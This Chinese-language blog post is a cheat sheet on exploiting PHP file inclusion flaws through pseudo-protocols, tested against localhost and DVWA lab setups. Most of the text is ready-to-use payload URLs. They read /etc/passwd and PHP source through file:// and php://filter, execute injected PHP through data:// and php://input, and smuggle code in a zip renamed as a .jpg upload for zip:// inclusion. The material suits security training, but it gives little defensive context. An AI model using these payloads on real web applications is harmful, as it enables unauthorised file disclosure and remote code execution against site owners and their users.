type
status
date
slug
summary
tags
category
icon
password
0x00 文件包含漏洞
漏洞参数原因:源码采用include危险函数,传入对象参数由用户输入控制,可访问上传的包含文件页面
漏洞利用前提:知道包含文件解析的绝对路径,可访问绝对路径页面
常见的为协议分类:
file:// 访问本地文件系统
http:// 访问 HTTPs 网址
ftp:// 访问 ftp URL
Php:// 访问输入输出流
Zlib:// 压缩流
Data:// 数据
Ssh2:// security shell2
Expect:// 处理交互式的流
Glob:// 查找匹配的文件路径
0x01 伪协议-file
利用条件:allow_url_fopen: off/on allow_url_include: off/on
Linux :http://127.0.0.1/FI/LFI.php?file=file:///etc/passwd 绝对路径
Windows :http://127.0.0.1:8001/vulnerabilities/fi/?page=file:///C:\DVWA-master\vulnerabilities\fi\1.txt 绝对路径
0x02 PHP伪协议
php://伪协议,主要为php://input与php://filter
php://input:将POST输入流当做PHP代码执行。其只受 allow_url_include参数的影响,allow_url_fopen开关与此伪协议无关。
php://filter伪协议:不受 allow_url_fopen与allow_url_include参数的影响
- *POC**:
http://127.0.0.1:8001/vulnerabilities/fi/?page=php://filter/resource=./1.txt 相对路径
http://127.0.0.1:8001/vulnerabilities/fi/?page=php://filter/resource=file:///C:\DVWA-master\vulnerabilities\fi\1.txt 绝对路径
http://127.0.0.1/FI/LFI.php?file=php://filter/resource=file:///etc/passwd
此协议主要用于读取php源代码时会用到
http://127.0.0.1:8001/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=./1.txt 以base64编码将内容输出
zip
条件:allow_url_fopen: off/on allow_url_include: off/on
1 、现将要执行 php 代码写好并且命名为 a.txt,将 a.txt 进行 zip 压缩,命名为 a.zip,如果可以上传 zip 文件便直接上传,如若不能可将 a.zip 命名为 a.jpg 上传;
2 、将 a.php 直接压缩成 a.bz2
http://127.0.0.1/LFI.php?file=zip://D:/phpstudy/PHPTutorial/WWW/a.zip%23a.txt
http://127.0.0.1/FI/LFI.php?file=zip://D:/phpstudy/PHPTutorial/WWW/a.jpg%23a.txt
phar
条件:allow_url_fopen: off/on allow_url_include: off/on php 版本大于等于php5.3.0
data
allow_url_fopen: on allow_url_include: on
http://192.168.6.128:8001/vulnerabilities/fi/?page=data://test/plain,<?php phpinfo();?>
http://192.168.6.128:8001/vulnerabilities/fi/?page=data://test/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
input
条件:allow_url_fopen:off/on allow_url_include:on
http://127.0.0.1/LFI.php?file=php://input
用post方式提交这个数据 <?php phpinfo()?>
http
allow_url_fopen与allow_url_include同时开启。缺一不可
http://localhost/test.php?file=http://www.baidu.com
- 作者:告白
- 链接:https://www.gbsec.top/article/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E4%BC%AA%E5%8D%8F%E8%AE%AE%E5%B0%8F%E7%BB%93%E5%A4%87%E5%BF%98%E5%BD%95
- 声明:本文采用 CC BY-NC-SA 4.0 许可协议,转载请注明出处。
相关文章